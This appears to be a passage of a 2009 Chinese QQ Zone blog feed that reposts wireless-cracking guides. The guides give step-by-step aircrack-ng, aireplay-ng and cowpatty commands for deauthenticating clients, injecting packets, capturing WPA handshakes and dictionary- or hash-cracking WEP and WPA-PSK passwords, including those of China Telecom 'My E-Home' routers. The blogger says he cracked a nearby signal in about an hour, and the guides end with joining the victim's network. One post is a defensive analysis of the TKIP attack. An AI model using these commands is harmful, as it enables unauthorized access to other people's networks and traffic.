key/s，提升了近300~~1000倍!!!这才是国内外无线黑客目前使用的破解技术，就一些地下组织而言，甚至个别秉持执著、探求本质精神的黑客通过改进优化代码等方式使得破解速率突破了150，000k/s，而且还有提升空间。这个速度意味着什么，如果再换置成最新的硬件配置呢?聪明的你一定明白。<br>　　下图6即为在cowpatty里对获取的WPA握手包进行WPA Table破解界面，可以看到在导入Table之后，破解速率达到了6，5228 pass/second。<br> <br>采用了类似Rainbow Tables原理，通过Pre-Compute即预运算的方式，来进行提前运算以生成WPA-PSK加密Hash，从而建立起来的WPA-PSK Hash Tables，可以如事先设想般有效地大幅度提升破解效率。一般来说，可以将以前的100~~300 key/s的普通单机破解速率，提升到30，000~~100，000 key/s，提升了近300~~1000倍!!!这才是国内外无线黑客目前使用的破解技术，就一些地下组织而言，甚至个别秉持执著、探求本质精神的黑客通过改进优化代码等方式使得破解速率突破了150，000k/s，而且还有提升空间。这个速度意味着什么，如果再换置成最新的硬件配置呢?聪明的你一定明白。<br>　即为在cowpatty里对获取的WPA握手包进行WPA Table破解界面，可以看到在导入Table之后，破解速率达到了6，5228 pass/second。<br> <br>我对我电脑搜索到得一个wpa信号进行试验，选中其中流量最大的一台客户端进行攻击，<br>大概一个小时左右密码就显示出来，效率还是可以的，破解出来的秘密为8位数，<br>的歌    发表于2009年09月26日 11:00 阅读(6) 评论(0) 分类： [url=javascript:;]个人日记 [/url][url=javascript:;]<wbr /><a href="http://b.cnc.qzone.qq.com/ac/b.gif" target="_blank"><img style="border:0;" src="http://b.cnc.qzone.qq.com/ac/b.gif" /></a><wbr />举报[/url] <br> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[769626132@qq.com(津津精品)]]></author>
<comments>http://769626132.qzone.qq.com/blog/1258467111#comment</comments>
<qz:effect>134218241</qz:effect>
<pubDate>Tue, 17 Nov 2009 14:11:51 GMT</pubDate>
<guid>http://769626132.qzone.qq.com/blog/1258467111</guid>
</item>

<item>
<title><![CDATA[破解电信我的E家无线网络]]></title>
<link>http://769626132.qzone.qq.com/blog/1258467005</link>
<description><![CDATA[ <br> <br><br> <br> <br>无线破解—中国电信“我的E家”无线wpa-psk加密<br>文图作者： Christopher Yang 【ZerOne】<br>欢迎转载，请注明作者及出处。<br>测试环境：Windows XP SP2<br>无线网卡：Intel Wireless 3945ABG 无线网卡<br>测试工具：Aircrack-ng for Windows套装<br>无线接入点类型：中国电信“我的E家”无线套餐--阿尔卡特无线路由器<br>作为目前中国电信正在国内普及的“我的E家”无线套餐，除了提供2M带宽的高速访问及其它优惠活动外，还提供一款家用型无线路由器。该无线路由器采用PPPOE方式上网，并支持多客户端进行有线及无线网络的连接，可以根据需要选择WEP、WPA-PSK等加密方式。具体路由器型号应地区不同稍有差异，下面就西北地区中国电信“我的E家”普遍配送的阿尔卡特无线路由器的无线加密破解进行分析。<br>下图为出自上海贝尔的阿尔卡特无线路由器配置页面<br>关于Linux下破解无线接入点wpa-psk加密的方法在论坛里已经有很多实例，具体各位可以参考置顶的主帖，所以这次我就讲述一下Windows XP环境下的破解WPA-PSK加密的步骤。<br>步骤1：搜索无线接入点信号，在Windows下可以使用的无线信号搜索工具有NetStumbler、WirelessMon、OmniPeek、Commview for WiFi等等，下图为使用Commview for WiFi进行无线扫描，可以看到，扫描到SSID为AR7WRD的无线接入点信号。<br>步骤2：将Windows版的Aircrack-ng套装解压缩到C盘下，需要说明的是，在其目录下应确保存在commview.dll、cygwin1.dll及ca2k.dll文件的存在，这些文件可以通过安装Commview for WiFi后在其安装目录中获得。在Windows下载入无线网卡，命令如下：<br>airserv-ng -d “commview.dll|debug” <br>其中：<br>-d 后跟网卡，在这里为笔记本上常见的内置Intel 3945ABG无线网卡，输入y确定。<br>注意：这里和Linux下的区别在于，Windows下并不能像载入eth0这样的方式载入无线网卡，所以airserv-ng的功能就是建立无线网卡连接服务，以便Aircrack-ng套装中其它无线黑客工具的载入。这里默认监听IP为本机，默认端口为666，可以修改。<br><br>步骤3：下面，打开airodump-ng进行无线抓包，命令如下：<br>airodump-ng -w x.cap 127.0.0.1：666<br>其中：<br>-w 后跟捕获的Cap数据包文件<br>后面的127.0.0.1：666即为本地无线网卡网络接口<br>步骤4：对目标进行Deauth攻击，命令如下：<br>aireplay-ng -0 5 –a AP’s MAC 127.0.0.1:666 <br>其中：<br>-0 num 使用Deauth攻击，num为发送攻击次数<br>-a AP’s MAC 指明预攻击AP的MAC，这里就是通过无线嗅探获取的阿尔卡特无线路由器的MAC <br>当Deauth攻击成功时，即可截获到WPA-PSK握手验证数据包，如下图右上角所示，在airodump-ng上会有明确提示。<br>步骤5：接下来，即可将捕获的数据包导入aircrack-ng破解，命令如下：<br>aircrack-ng –w dict WPA-PSK’s Cap <br>其中：<br>-w 载入字典<br>后跟上面截获的WPA-PSK验证数据包。<br>在稍等片刻后，即可看到如下图所示般，破解出对方的WPA-PSK连接密码了。<br>继续延伸： <br>除了传统的字典破解，还可以使用定制的Hash进行WPA-PSK高速破解。将截获的cap文件导入到cowpatty破解，命令如下： <br>cowpatty –d WPA-PSK-Hash -r WPA-PSK’s Cap -s SSID <br>其中： <br>-d 导入事先制作的WPA-PSK-Hash <br>-r 导入事先捕获的WPA-PSK握手验证包 <br>-s 无线接入点的SSID，这里就是AR7WRD <br>稍等片刻，就可以看到下图中被成功破解的WPA-PSK加密密码，破解时间只花费了0.36秒，破解速度达到了65228.41 key / s。<br>至此，中国电信“我的E家”的无线接入点WPA-PSK加密即已被成功破解，只需要将自己的网卡中设置为此密码即可连接至该无线路由器进行上网操作了。<br>至此，中国电信“我的E家”的无线接入点WPA-PSK加密即已被成功破解，只需要将自己的网卡中设置为此密码即可连接至该无线路由器进行上网操作了。<br><wbr /><a href="http://b.cnc.qzone.qq.com/ac/b.gif" target="_blank"><img style="border:0;" src="http://b.cnc.qzone.qq.com/ac/b.gif" /></a><wbr /> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[769626132@qq.com(津津精品)]]></author>
<comments>http://769626132.qzone.qq.com/blog/1258467005#comment</comments>
<qz:effect>134218241</qz:effect>
<pubDate>Tue, 17 Nov 2009 14:10:05 GMT</pubDate>
<guid>http://769626132.qzone.qq.com/blog/1258467005</guid>
</item>

<item>
<title><![CDATA[BT4破解]]></title>
<link>http://769626132.qzone.qq.com/blog/1258466947</link>
<description><![CDATA[BT4破解 <br> <br><br> <br> BT4破解无线网络详解<br>1.下载光盘版BT4VM版和虚拟机，制作虚拟启动BT4。VM版的BT4可 能都集成网卡无用，但对USB网卡支持很好。<br>2.启动BT4，选console控制台模式，用户名root,密码toor&lt;注意不是root&gt;,再运行startx启动窗口模式。<br>另：BT4启动黑屏问题解决办法<br>输入root toor 登录系统后在输入 fixvesa 然后 startx如果不行就输入 fixvmware,然后输入startx.还是不能就输入Xorg -configure 然后startx<br>我的笔记本是三星R458的，启动BT4，startx时按住空格可以进入.。<br>在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会，然后出来提示符再输入startx 可进入<br>win窗口；当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令，同时可用alt+f1 打开<br>一个shell，alt+f2 打开第二个shell，alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键<br>---------------------end---------------------<br>[] 可选<br>&lt;&gt; 回显<br>/ 或者<br>() 提示<br>---------------------WEP---------------------<br>shell 1:----------------------------------------<br>1.ifconfig -a<br>&lt;wlan0 ... xx:xx:xx:xx:xx:xx&gt;<br>[<br>macchanger -m 00:11:22:33:44:55 wlan0<br>&lt;修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入&gt;<br>]<br>2.ifconfig -a wlan0 up<br>(可能要加载网卡才支持注入?)<br>3.airmon-ng start wlan0 6<br>&lt;monitor mode enabled on mon0&gt;<br>(6是频道)<br>另一说5100要支持注入用airmon-ng start wlan0<br>如果这里回显&lt;(monitor mode enabled)&gt; 则下面命令所有端口号要用&quot;wlan0&quot;<br>[<br>aireplay-ng -9 mon0 / aireplay-ng --test mon0<br>&lt;Injection is working/No anwser&gt;(注入攻击成功/不成功)<br>(检测你的网卡是否支持注入)<br>]<br>4.airodump-ng -w pack -c 6 mon0/wlan0<br>(pack是随便起的获取的ivs的保存文件的名字)<br>另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0<br>shell 2:----------------------------------------<br>一、有客户端：<br>破解:abcd四种方式<br>a.合法客户端产生大量有效的数据，能直接获得大量cap。<br>收到10000以上data后，直接转shell 3,破解密码<br>b.合法客户端只能产生少量数据，就需要注入&lt;-3&gt;攻击加速产生大量数据。<br>5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)<br>&lt;Read 11542 packets &lt;got 12587 ARP ...&gt;,send 71524 packets ... 很多类似行&gt;<br>c.合法客户端不在通信，注入模式不成功，<br>用-0 冲突模式强制断开合法客户端和ap连接，使之重新连接，<br>新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入<br>5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0<br>6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0<br>(可能要另开窗)<br>d.有客户端，并且客户端能产生有效arp 数据的另类破解方式<br>输入modprobe –r iwl3945<br>(加载网卡)<br>输入modprobe ipwraw<br>输入airmon-ng start wlan0 6<br>现在，只要一个命令就搞定，输入:<br>输入wesside-ng -i wlan0 -v 01:02:03:04:05:06&lt;此格式的APmac&gt;。 <br>&lt;key: 12:34:56:78:90&gt;<br>二、无客户端：<br>5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0<br>(我成功了)<br>另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0<br>&lt;Authentication successful&gt;<br>&lt;Association successful&gt;<br>(建立虚拟伪装连接)<br>如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)<br>破解:abcd四种方式<br>a.-2 crack mode ---------------<br>建立虚拟连接后直接用-2交互攻击模式集合了抓包，提数据和发包攻击<br>6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0<br>发包成功后可得到足够的ivs，然后用aircrack-ng破解<br>b.-3 crack mode ---------------<br>6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0<br>7.用aircrack-ng破解&lt;自己添加的步骤?&gt;<br>c.-4 crack mode ---------------<br>-4攻击模式；制造数据包；-2交互式攻击模式<br>6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0<br>&lt;?yes&gt;<br>&lt;Saving keystream in replay_dec-0523-075615.xor&gt;<br>7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp<br>(提取上面xor 文件来伪造一个arp包)<br>8.aireplay-ng -2 -r myarp mon0<br>一说用aireplay-ng -2 -r myarp -x 512 mon0<br>(发现了可利用的myarp的数据包，按y后，立刻注入攻击。Date疯涨)<br>9.用aircrack-ng破解<br>d.-5 crack mode ---------------<br>-5碎片攻击模式；制造数据包；-2交互式攻击模式<br>(我成功过)<br>6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0<br>&lt;?yes&gt;<br>&lt;Saving keystream in fragment-1216-201426.xor&gt;<br>(利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件（xor 文件）)<br>7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp<br>(Myarp随便起的文件名)<br>&lt;Wrote packet to: myarp&gt;<br>8.aireplay-ng -2 -r myarp -x 256/512 mon0<br>&lt;?yes&gt;<br>(这时，前面的抓包窗口上的data 将迅速增加)<br>(512是攻击速度，1024是最大值)<br>9.采用aircrack-ng 来进行破解<br>shell 3:----------------------------------------<br>aircrack-ng *.cap<br>如果shell 1用了--ivs 参数，则这里用aircrack-ng *.ivs<br>(我成功了)<br>另一说用aircrack-ng -n 64 -b APmac pack-01.cap<br>&lt;KEY FOUND! [......] &lt;ASCII:XXXXX&gt;&gt;<br>附:<br>5100用BT4+spoonwep2破解<br>1.把spoonwep2放在BT4\modules\下,启动BT4<br>2.<br>ln -fs bash /bin/sh<br>ls -al /bin/sh<br>&lt;显示bash为成功,dash为失败&gt;<br>3.开spoonwep2，里面可以找到网卡了,选wlan0进入搜索，但这时不会搜出来什么，<br>关闭一下spoonwep2再重启spoonwep2，<br>这时网卡项里有一个mon0的，选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack，点击launch后就等待密<br>码的出来(sata数据包到30000个左右)。<br>(注：论坛中的高手说spoonwep2支持5100AGN网卡注入式破解)<br>---------------------end---------------------<br>---------------------WPA---------------------<br>1.ifconfig -a<br>&lt;wlan0 ... xx:xx:xx:xx:xx:xx&gt;<br>2.ifconfig -a wlan0 up<br>3.airmon-ng start wlan0 6<br>&lt;monitor mode enabled on mon0&gt;<br>(6是频道)<br>4.airodump-ng -w 12345 -c 6 mon0/wlan0<br>(保存名为12345.cap)<br>(-w：写入文件，-c：截取cap的频道)<br>5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0<br>或者输入：aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能不对)<br>&lt;18:56:20 Sending 64 directed DeAuth,... 一些类似行&gt;<br>(-c后面为合法无线客户端的MAC地址)<br>(迫使AP重新与已连接的合法客户端重新握手验证)<br>(攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万，<br>因为它只要一个包含WPA握手验证包就可以了)<br>Cap数据包破解:<br>a.暴力破解<br>6.aircrack-ng -x -f 2 12345*.cap<br>另一说是用aircrack-ng -z -b (ap mac) 12345*.cap<br>b.字典破解<br>6.aircrack-ng -w password.txt 12345*.cap<br>另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap<br>(<br>-w：是字典破解模式<br>Password.txt是你事先准备好的字典。<br>技巧：可以在windows 下使用下载的字典工具生产字典，再在BackTrack3 下拷贝到/root 下（aircrack 默认<br>的工作目录在/root）。<br>请注意，破解WPA 密码的时间取决于密码难易程度，字典包含程度，内存及CPU 等。多则数小时。<br>)<br>c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解<br>启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap<br>Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key...<br>&lt;Key Found! [xxxxxxxx]&gt;<br>d.HASH破解<br>6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小写)<br>(Windows版本操作步骤与其Linux下版本完全一致)<br>(<br>参数解释：<br>-f 这里跟上采用的字典<br>-d 生成的Table文件名称<br>-s 目标AP的ESSID<br>)<br>7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK<br>(<br>参数解释：<br>-d 导入WPA PMK Hash Table文件名称，下图中为dlink-birth.hash<br>-r 事先捕获的WPA握手数据包<br>-s 目标AP的ESSID<br>)<br>---------------------end---------------------<br>WPA破解，怎么知道有握手包被截获？<br>airodump-ng监视窗右上角有提示:<br>...... WPA handshake: 00:90:4c:8e:00:65<br>BT4抓包后，cap文件保存在哪？<br>输入ls可以看到啊,默认在root下。<br>如何获得合法端mac？<br>windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截，Linux可用<br>Kismet、Aircrack-ng中的airodump-ng等来实现。需要注意的是，若目标网络采用WEP或者WPA加密的话，有时需先行破解再对数据<br>包解密方可看到客户端MAC。<br>前面第一个shell，如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac<br>BSSID             STATION ...<br>aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb<br>如何查找隐藏的SSID？<br>1.在BT4下先打开一个shell,输入<br>airodump-ng 网卡端口<br>2.打开另一个shell,输入<br>aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口<br>可能这个命令由于频道不对会出错,这时就要多重输几次(如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止<br>3.然后就可以在上个shell,看到显示出来的SSID。 <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[769626132@qq.com(津津精品)]]></author>
<comments>http://769626132.qzone.qq.com/blog/1258466947#comment</comments>
<qz:effect>134218240</qz:effect>
<pubDate>Tue, 17 Nov 2009 14:09:07 GMT</pubDate>
<guid>http://769626132.qzone.qq.com/blog/1258466947</guid>
</item>

<item>
<title><![CDATA[无线通讯加密技术WPA被破解]]></title>
<link>http://769626132.qzone.qq.com/blog/1258466815</link>
<description><![CDATA[ <br><br><span style="font-size:18px;line-height:1.8em;">     最近几日网上有很多关于无线通讯加密技术WPA被破解的文章，观其内容不外乎提到了WPA加密技术能够在十几分钟内被破解的话题，那么无线通讯真的不再安全了吗？WPA真的如文章所说成为继WEP技术后第二个“投诚”的加密手段吗？今天就请各位IT168读者睁大眼睛切勿断章取意跟随笔者一起细品WPA被破解的真实内容，看看WPA是否真的如文章所说一无事处。     <br>一、WPA被破解全过程： <br>   研究员ErikTews将在东京的PacSec大会上，演示他是如何在15分钟内破解WPA加密技术的。之前的无线加密技术WEP只需使用当今的笔记本即可在几分钟内破解，而WPA作为WEP的替代者在以往安全等多个方面的表现相当不错。 <br>   EricTews将演示他是如何破解WPA加密技术来读取从路由器传往笔记本的数据。为了读取正在传送的数据，Tews找到了无需用字典攻击法，来破解临时密钥完整性协议（TKIP）的方法。本次破解将给用户和厂商带来巨大的影响。WPA是目前最普遍的加密标准之一，而且还有更可靠的标准WPA2（它使用的是高级加密标准AES，所以不会受到该破解的影响），但是它还不是很成熟。用户只能被迫停留在不安全的WPA加密技术上。 <br>   由于WPA2技术在很多设备上都无法顺利运行，很多设备不支持WPA2加密，所以到目前为止最好的看似最安全的技术就要属WPA了，但是随着本次WPA被破解恐怕没有再好的技术让我们放心使用无线网络了。<br>二、切勿断章取意 细品WPA被破事件： <br>   那么是否WPA被破解后无线网络的安全就真的没有任何保障了吗？基于WPA加密的无线网络是否真的有如一层窗户纸一样被轻易桶破呢？下面笔者就来仔细分析下本次针对WPA加密通讯破解的来龙去脉。 <br>   （1）WPA所用的TKIP密钥并未被破解： <br>   根据Tews/Beck的方法，攻击者嗅探数据包，略作修改影响校检，校检的结果会寄回接入点，允许攻击者解密个别的数据包。不过这种攻击只对短数据包有效，长数据包仍然很安全，TKIP并没有破解，但攻击能引起地址解析协议（AddressResolutionProtocol，ARP）中毒和可能的DNS(域名服务)欺骗或中毒。 <br>   所以说这种攻击虽然可以获取数据包内容，但是TKIP这个关键的密钥信息并没有真正的还原出来，所以WPA无线网络不能认为是彻底不安全，毕竟仅仅还原出TKIP加密过的数据包没有太大意义，网络中很多通讯都已经针对数据包进行了加密。这种破解只相当于把一个里三层外三层包裹得非常严实的物品拆开其中的一层包装而已。还原出来的数据包还是被相关网络服务与网络应用所加密过的。 <br>   小 结——WPA通讯数据包能够被窃取还原会原数据包，但是入侵者无法将TKIP这个重要密钥破解。入侵者只能够获得通讯数据包，无法对无线路由器进行入侵。 <br>   （2）AES密钥依然非常安全： <br>   说到WPA加密使用过他的用户都知道我们可以在密钥类型上有三种选择，依次为TKIP，AES以及TKIP+AES，而本次发布的破解仅仅是针对TKIP加密方式的，因此我们完全可以修改WPA加密方式转换为AES类别，这样就会变得非常安全。<br>小提示： <br>   在加密时如果为了确保安全我们不要选择TKIP+AES这种方式，因为此方式是应用两种加密密钥都可以，所以还是会存在TKIP加密的情况，从而带来安全问题。 <br>   小 结——WPA加密被破解仅仅是针对TKIP密钥而言，我们只要修改密钥加密方式为AES加密就可以有效解决安全问题，让WPA加密非常安全。 </span><wbr /><br><span style="font-size:18px;line-height:1.8em;">（3）WPA2安然无恙：<br>除了上述所说的两点外就算是WPA被彻底破解，我们的无线安全也不是一无事处的，要知道除了WPA外我们还可以使用更高级别的WPA2方式来加密无线网络通讯数据，相比WPA加密方式WPA2被破解的难度更大，这是因为相比从WEP到WPA仅仅通过软件升级不同的是，从WPA到WPA2的升级是基于硬件的提升，这样就从根本上提高了网络通讯的安全。不过随之而来的就是一些网络无线设备会因为硬件问题而无法与WPA2兼容。 <br>   小 结——WPA2相比WPA加密方式要安全很多，因此就算WPA不安全我们也可以通过WPA2对通讯加密，防止无线入侵者攻击无线网络。 <br>   （4）无线路由器安然无恙： <br>   正如上文所说Tews/Beck的方法是攻击者嗅探数据包，略作修改影响校检，校检的结果会寄回接入点，允许攻击者解密个别的数据包。不过这种攻击只对短数据包有效，长数据包仍然很安全，TKIP并没有破解，所以说在这种情况下无线路由器是安全的。由于TKIP信息没有被破解，因此入侵者的无线设备是不可能被成功接入到WPA加密的无线网络中，所以无线路由器以及内网其他无线设备都是安全的。入侵者能够做的只是还原出数据信息而不是越权攻击网络。 <br>   小 结——Tews/Beck的方法只能够让入侵者成为一个旁观者浏览通讯数据包信息而无法让他们成为一个真正的使用者来连接WPA加密过的无线网络。所以说在这种情况下WPA网络内的无线路由器以及各个无线客户端是相对安全的。 <br>   三、总结： <br>   从本文的分析可以看出虽然Tews/Beck提供了获取WPA加密数据包原文的方法，但是这种方法还不能够算真正意义上的破解WPA，作为WPA加密过程中的核心TKIP密钥没有被破解，所以WPA网络自身还是安全的，另外我们还可以借助AES以及WPA2等多方式解决此问题。总之WPA被破事件并没有像网络上炒作的那么邪乎，希望各位读者可以通过本文了解事件真像，切勿断章取意。</span><wbr /> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[769626132@qq.com(津津精品)]]></author>
<comments>http://769626132.qzone.qq.com/blog/1258466815#comment</comments>
<qz:effect>134218240</qz:effect>
<pubDate>Tue, 17 Nov 2009 14:06:55 GMT</pubDate>
<guid>http://769626132.qzone.qq.com/blog/1258466815</guid>
</item>

<item>
<title><![CDATA[利用PMK Hash进行WPA/WPA2高速破解(图)]]></title>
<link>http://769626132.qzone.qq.com/blog/1258466635</link>
<description><![CDATA[ <br> <br><span style="color:#00ff00;line-height:1.8em;">本文涉及Hash主要基于Cowpatty下的genpmk工具制作，这是ZerOne安全团队无线安全组通过与Aircrack-ng的airolib-ng及相关工具的便捷性、通用性反复对比后最终决定的。为方便大家学习，下面讲述一下基本的WPA PMK Hash制作方法及在进行WPA-PSK/WPA2-PSK破解时的Hash的使用方法。</span><wbr /> <span style="font-weight:bold"><wbr /><span style="color:#00ff00;line-height:1.8em;">　　1.Hash制作篇</span><wbr /></span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　以下涉及工具的Windows版本操作步骤与其Linux下版本完全一致，大家对照进行即可。</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　具体步骤：在进入到Linux Shell / Windows Command下后，先使用genpmk这个工具来构建预运算Hash Table，这里需要指定针对目标的ESSID，命令如下：</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　genpmk -f dictionary -d hash -s SSID</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　参数解释：</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　-f 这里跟上采用的字典</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　-d 生成的Table文件名称</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　-s 目标AP的ESSID</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;"><wbr /><a href="http://b26.photo.store.qq.com/http_imgload.cgi?/rurl4_b=d6f0f2747e2a63f8540dea9b1d7ba22e900414b810641fcab1bc86b7cd238ebb0212cd8ff87c73d95ba18e2c7d59357ae91e8caa496be3d83880e9f2830d3fb3decddbad30222732d9936027d4044047271b5527&amp;a=26&amp;b=26" target="_blank"><img style="width:480px;height:177px;border:0;" src="http://b26.photo.store.qq.com/http_imgload.cgi?/rurl4_b=d6f0f2747e2a63f8540dea9b1d7ba22e900414b810641fcab1bc86b7cd238ebb0212cd8ff87c73d95ba18e2c7d59357ae91e8caa496be3d83880e9f2830d3fb3decddbad30222732d9936027d4044047271b5527&amp;a=26&amp;b=26" /></a><wbr /></span><wbr /><br><span style="font-weight:bold"><wbr /><span style="color:#00ff00;line-height:1.8em;">　　2.Hash使用篇</span><wbr /></span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　具体步骤：在进入到Linux Shell / Windows Command下后，使用cowpatty这个工具来导入WPA预运算Hash Table，这里仍需要指定针对目标的ESSID，命令如下：</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　cowpatty –d Hash -r *.cap -s SSID</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　参数解释：</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　-d 导入WPA PMK Hash Table文件名称，下图中为dlink-birth.hash</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　-r 事先捕获的WPA握手数据包</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　-s 目标AP的ESSID</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;"><wbr /><a href="http://b26.photo.store.qq.com/http_imgload.cgi?/rurl4_b=d6f0f2747e2a63f8540dea9b1d7ba22e4236834a6cc6e61bf420c412019dedf7af322de597fce2c5efe33d9e3a36e8018b1c983cc72be3132d49c449ed57e57861378c54171085bb3cff2ac97f129c5f973cc5bd&amp;a=26&amp;b=26" target="_blank"><img style="width:480px;height:178px;border:0;" src="http://b26.photo.store.qq.com/http_imgload.cgi?/rurl4_b=d6f0f2747e2a63f8540dea9b1d7ba22e4236834a6cc6e61bf420c412019dedf7af322de597fce2c5efe33d9e3a36e8018b1c983cc72be3132d49c449ed57e57861378c54171085bb3cff2ac97f129c5f973cc5bd&amp;a=26&amp;b=26" /></a><wbr /></span><wbr /><br><span style="font-weight:bold"><wbr /><span style="color:#00ff00;line-height:1.8em;">　　3.测试数据对比</span><wbr /></span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　测试环境：</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　OS： Windows XP SP3</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　CPU： Intel双核 T7100</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　</span><wbr /><a href="http://product.yesky.com/memory/" target="_blank"><span style="color:#00ff00;line-height:1.8em;">内存</span><wbr /></a><wbr /><span style="color:#00ff00;line-height:1.8em;">： 2.5GB</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　一般字典模式下，平均破解速率为57.28 key /秒，如下图：</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;"><wbr /><a href="http://b27.photo.store.qq.com/http_imgload.cgi?/rurl4_b=d6f0f2747e2a63f8540dea9b1d7ba22e4fa6360de41a1d6f030a8eec9814d64ccfa6fe18dc6d9f5cbfe47626e17b214252ebb6f213a9c45786162a40f57a383b4c571085385d7344086068b52821b230f13ab81b&amp;a=27&amp;b=27" target="_blank"><img style="width:480px;height:154px;border:0;" src="http://b27.photo.store.qq.com/http_imgload.cgi?/rurl4_b=d6f0f2747e2a63f8540dea9b1d7ba22e4fa6360de41a1d6f030a8eec9814d64ccfa6fe18dc6d9f5cbfe47626e17b214252ebb6f213a9c45786162a40f57a383b4c571085385d7344086068b52821b230f13ab81b&amp;a=27&amp;b=27" /></a><wbr /></span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　使用WPA Hash Table模式下，平均破解速率为71566.66 key/秒，如下图：</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;"><wbr /><a href="http://b26.photo.store.qq.com/http_imgload.cgi?/rurl4_b=d6f0f2747e2a63f8540dea9b1d7ba22e42061bfd8bf65c5933aff23d3ceae08576a50956bd57397fbe3658c01f829d75a6fa29e98d1311ea0b0abcb6bbef6635f097cd5ef30c5ca4ef24fe194a63b12fb67d9901&amp;a=26&amp;b=26" target="_blank"><img style="width:480px;height:170px;border:0;" src="http://b26.photo.store.qq.com/http_imgload.cgi?/rurl4_b=d6f0f2747e2a63f8540dea9b1d7ba22e42061bfd8bf65c5933aff23d3ceae08576a50956bd57397fbe3658c01f829d75a6fa29e98d1311ea0b0abcb6bbef6635f097cd5ef30c5ca4ef24fe194a63b12fb67d9901&amp;a=26&amp;b=26" /></a><wbr /></span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　通过对比可以看到，破解速率提升了不止数倍，而是原先的近1300倍!!以上是Cowpatty所使用的WPA PMK Hash Table破解实现及效果。</span><wbr /><br><span style="font-weight:bold"><wbr /><span style="color:#00ff00;line-height:1.8em;">　　4.测试数据对比</span><wbr /></span><wbr /><br><span style="color:#00ff00;line-height:1.8em;">　　</span><wbr /><br><span style="color:#00ff00;line-height:1.8em;"><wbr /><a href="http://b27.photo.store.qq.com/http_imgload.cgi?/rurl4_b=d6f0f2747e2a63f8540dea9b1d7ba22e26aa56966461420ec94e1fc6000fdb6f50bdaa2c2d712019513ac0a4e4ec50025a33074238112a0736012fe073dacecafafd43a28ef760ee5483c8a142265388e80dc2eb&amp;a=27&amp;b=27" target="_blank"><img style="width:480px;height:148px;border:0;" src="http://b27.photo.store.qq.com/http_imgload.cgi?/rurl4_b=d6f0f2747e2a63f8540dea9b1d7ba22e26aa56966461420ec94e1fc6000fdb6f50bdaa2c2d712019513ac0a4e4ec50025a33074238112a0736012fe073dacecafafd43a28ef760ee5483c8a142265388e80dc2eb&amp;a=27&amp;b=27" /></a><wbr /></span><wbr /> <!--v:3.2--> ]]></description>
